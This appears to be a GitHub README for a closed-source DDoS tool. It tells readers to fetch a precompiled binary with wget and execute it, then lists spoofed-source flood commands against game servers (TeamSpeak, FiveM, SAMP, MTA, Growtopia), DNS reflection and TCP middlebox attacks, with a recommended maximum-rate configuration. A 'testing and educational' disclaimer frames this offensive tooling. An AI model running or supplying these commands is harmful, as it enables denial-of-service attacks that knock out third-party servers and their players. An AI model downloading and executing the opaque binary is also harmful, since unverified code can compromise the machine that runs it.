- Spoofing Server
ovh-ddos is a powerful network testing tool designed for stress-testing various online services. It provides multiple attack vectors, allowing researchers to analyze network resilience against different types of traffic floods.
# Download the precompiled binary
wget https://raw.githubusercontent.com/ivanivek/ovh-ddos/refs/heads/main/ovh-ddos
chmod +x ovh-ddos ; ./ovh-ddos
./ovh-ddos -i <interface> -h <host> [action] [options]
./ovh-ddos -T -h ipadress -p teamspeakport -s sourceip -j pps -m thread -i interface
./ovh-ddos -T -h ip -p 9987 -s random -j 800000000 -m 32 -i eth0
The maximum attack configuration applies to all attack types and options for peak efficiency.
./ovh-ddos -F -h ipadress -p sampport -s sourceip -j pps -m thread -i interface
./ovh-ddos -B -h ipadress -p 30120 -s sourceip -j pps -m thread -i interface
./ovh-ddos -Q -h ipadress -p mtaport -s sourceip -j pps -m thread -i interface
Action | Description |
---|---|
-T |
TeamSpeak Flood (Verified packets) |
-B |
FIVEM Flood (Partial validation) |
-G |
Growtopia/GTPS Flood |
-L |
TCP Middleboxes Attack |
-F |
SAMP Flood (Requires hexl.txt) |
-Q |
MTA Flood |
-W |
DNS Reflection |
Option | Description |
---|---|
-i [interface] |
Specify network interface (Required) |
-h [host] |
Target host(s) |
-p [port] |
Target port (Default: Random) |
-s [ip] |
IP spoofing (CIDR supported, use -s spoofing for random source IPs) |
-j [pps] |
Packets per second limit |
-m [threads] |
Number of threads (Default: 1) |
-t [time] |
Attack duration in seconds |
--help |
Show usage help |
If this project reaches 10+ GitHub stars, new attack types will be added, including:
- RAGE-MP Flood (Targeting multiplayer game servers)
- Rust Game Flood (Packet stress testing for Rust servers)
- More attack vectors for testing various online services!
If this project reaches 50+ GitHub stars, the source code will be made publicly available!
This tool should only be used for testing and educational purposes on systems you have explicit permission to assess. The author is not responsible for any misuse of this software.
This project is closed-source and proprietary. Redistribution, modification, or reverse engineering of the binary is strictly prohibited. Unauthorized use is not permitted.